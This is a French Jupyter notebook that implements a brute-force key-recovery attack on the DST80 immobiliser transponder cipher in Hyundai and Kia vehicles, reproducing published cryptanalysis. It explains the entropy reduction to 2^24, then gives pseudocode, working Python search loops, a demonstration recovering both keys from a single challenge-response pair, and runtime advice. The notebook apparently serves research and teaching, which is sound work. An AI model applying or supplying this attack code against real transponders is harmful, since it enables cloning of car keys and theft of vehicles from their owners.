# Brute Force pour les modèles Kia et Hyundai

Auteur: [Kaci Amaouche](mailto:amaouchekaci28@gmail.com)

Dans ce [Jupyter](https://jupyter.org/) notebook,nous présentons une attaque sur DST80 pour les modèles Hyundai et Kia. Si vous n'êtes pas familier avec Jupyter, vous pouvez jeter un coup d'œil rapide à la documentation ou aux tutoriels disponibles[Notebook Basics](https://jupyter-notebook.readthedocs.io/en/stable/examples/Notebook/Notebook%20Basics.html) guide (~5min).

Ce notebook comporte:

* [Configuration de l'environnement]
* [Implémentation]

## 1 - Configuration de l'environnement

Pour pouvoir exécuter ces scripts, il va falloir:
1. Ce notebook (the `.ipynb` file) et le script DST80_Algo qui doit être dans le même répertoire
1. Python >= 3.8
1. Seules les librairies standard sont utilisées 

## 2 - Implémentation

# Une brève explication

Les chercheurs ont prouvé (les détails sont expliqués en profondeur dans le document "DST80_cryptanalyse" de ce même référentiel) que tous les modèles de voitures Kia et Hyundai possèdent une partie fixe de 16 bits, positionnée à droite pour la clé keyL et à gauche pour la clé keyR. Cela entraîne une réduction de l'entropie de 80 bits à (40-16)+(40-16) = 48 bits.

Mieux encore, ils ont identifié une relation linéaire entre keyL et keyR, ce qui réduit davantage l'entropie à seulement 24 bits. En conséquence, la complexité temporelle totale s'établit à $2^{24}$ opérations de chiffrement.

On importe le script qui contient l'algorithme de chiffrement DST80

In [13]:
from DST80_Algo import *

Pour l'implémentation, voici le pseudo-code proposé par les chercheurs :

In [5]:
#Algorithme 3 : Récupérer les clés DST80 pour les transpondeurs configurés pour les véhicules Hyundai et Kia. Les deux constantes de 2 octets X et Y sont la partie fixe des deux clés.

#1: fonction Rechercher_Cle(C, S). Avec C - Défi ; S - Signature
#2: pour i dans {0...224} faire
#3:     keyL[4], keyL[3], keyL[2] ← i[0], i[1], i[2]
#4:     keyL[1], keyL[0] ← X
#5:     keyR[4], keyR[3] ← Y
#6:     keyR[2] ← ¬keyL[2]
#7:     keyR[1] ← ¬keyL[3]
#8:     keyR[0] ← ¬keyL[4]
#9:     crc, sig ← DST80(C, keyL, keyR)
#10:    si sig == S alors retourner keyL, keyR
#11:    fin si
#12: fin pour
#13: fin fonction


Pour l'implémentation, une approche alternative serait d'utiliser trois boucles imbriquées, chacune parcourant un espace de $2^8$ itérations.

In [14]:
def search_key(Challenge, Response, X, Y):
    """
    Recherche des clés DST80 en utilisant une approche de force brute.

    Cette fonction effectue une recherche par force brute pour trouver les clés DST80
    qui correspondent à un défi et une signature donnés. Elle itère à travers
    les valeurs de clé possibles en utilisant des boucles imbriquées.

    Args:
    Challenge (int): Valeur du défi.
    Response (int): Valeur de la signature / Response.
    X (int): Valeur de la constante X.
    Y (int): Valeur de la constante Y.

    Returns:
    tuple: Un tuple contenant les représentations hexadécimales de keyL et keyR trouvées si une correspondance est trouvée.
           Renvoie None si aucune clé correspondante n'est trouvée.
    """

    # Initialisation des variables
    s = 0
    keyL, keyR = [0, 0, 0, 0, 0], [0, 0, 0, 0, 0]

    # Boucle pour parcourir les valeurs possibles de keyL[0]
    for k in range(2**8):
        # Boucle pour parcourir les valeurs possibles de keyL[1]
        for j in range(2**8):
            # Boucle pour parcourir les valeurs possibles de keyL[2]
            for i in range(2**8):
                # Remplissage des valeurs de keyL et keyR en fonction des constantes X et Y
                keyL[0], keyL[1], keyL[2] = i, j, k
                keyL[3], keyL[4] = divmod(X, 256) # La partie fixe X
                keyR[0], keyR[1] = divmod(Y, 256) # La partie fixe Y
                keyR[2], keyR[3], keyR[4] = 255 - k, 255 - j, 255 - i

                # Conversion des parties de clé en valeurs entières
                kl = (keyL[0] << 32) | (keyL[1] << 24) | (keyL[2] << 16) | (keyL[3] << 8) | keyL[4]
                kr = (keyR[0] << 32) | (keyR[1] << 24) | (keyR[2] << 16) | (keyR[3] << 8) | keyR[4]

                # Calcul du résultat de DST80 avec les clés candidates
                s = dst80(kl, kr, Challenge)

                # Vérification si le résultat correspond à la signature S
                if s == Response:
                    # Retourne les clés trouvées au format hexadécimal
                    return hex(kl), hex(kr)
    # Aucune clé correspondante n'a été trouvée
    return None


On pourra prendre un exemple pour vérifier la validité de cette attaque 

In [15]:
# On choisit des valeurs aléatoires pour  keyL et keyR 
keyL,keyR=0x955a3eaaaa ,0xaaaac1a56a

#On extraire ensuite les deux parties fixes X et Y qui sont de la forme  keyL= A | X et keyR = Y | B , avec A et B sur 24 bits.
X,Y=(keyL&0xFFFF),(keyR>>24)&0xFFFF

#On prend également un challenge aléatoire
Challenge=123

#On calcule ensuite le chiffré du challenge
Response=dst80(keyL, keyR, Challenge)

Il suffit d'appeler la fonction avec ces arguments

In [ ]:
keyL_found, keyR_found = search_key(Challenge, Response, X, Y)
print(keyL_found==keyL, keyR_found==keyR)

Afin d'obtenir une performance optimale, il est recommandé d'adopter le module PyPy, qui génère une accélération potentielle allant jusqu'à 100 fois par rapport à d'autres environnements d'exécution.

Dans le contexte de cet exemple, le temps nécessaire sera significatif. J'ai réalisé des tests de performances pour cette attaque en utilisant le module PyPy, et dans le scénario le plus exigeant, l'attaque pourrait nécessiter jusqu'à 6,5 heures pour s'achever.

Afin de garantir le bon fonctionnement, mes tests suggèrent la possibilité de réduire la complexité de l'algorithme (uniquement dans ce cas précis).
 
Cependant, il est impératif de maintenir l'algorithme dans sa forme générale pour les autres cas.

Voici une approche pour adapter les boucles de l'algorithme spécifiquement dans cet exemple, afin de valider son fonctionnement 

In [20]:
def test_validite(Challenge, Response, X, Y):
   
    # Initialisation des variables
    s = 0
    keyL, keyR = [0, 0, 0, 0, 0], [0, 0, 0, 0, 0]

    # On modifie la boucle
    for k in range(0x3e, 2**8):
        # On modifie la boucle
        for j in range(0x50, 2**8):
            # Boucle pour parcourir les valeurs possibles de keyL[2]
            for i in range(2**8):
                # Remplissage des valeurs de keyL et keyR en fonction des constantes X et Y
                keyL[0], keyL[1], keyL[2] = i, j, k
                keyL[3], keyL[4] = divmod(X, 256) # La partie fixe X
                keyR[0], keyR[1] = divmod(Y, 256) # La partie fixe Y
                keyR[2], keyR[3], keyR[4] = 255 - k, 255 - j, 255 - i

                # Conversion des parties de clé en valeurs entières
                kl = (keyL[0] << 32) | (keyL[1] << 24) | (keyL[2] << 16) | (keyL[3] << 8) | keyL[4]
                kr = (keyR[0] << 32) | (keyR[1] << 24) | (keyR[2] << 16) | (keyR[3] << 8) | keyR[4]

                # Calcul du résultat de DST80 avec les clés candidates
                s = dst80(kl, kr, Challenge)

                # Vérification si le résultat correspond à la signature S
                if s == Response:
                    # Retourne les clés trouvées au format hexadécimal
                    return hex(kl), hex(kr)
    # Aucune clé correspondante n'a été trouvée
    return None

On l'appelle avec les arguments précédents

In [23]:
keyL_found, keyR_found = test_validite(Challenge, Response, X, Y)
print(keyL_found, keyR_found)

0x955a3eaaaa 0xaaaac1a56a


On voit clairement que c'est les bonnes clés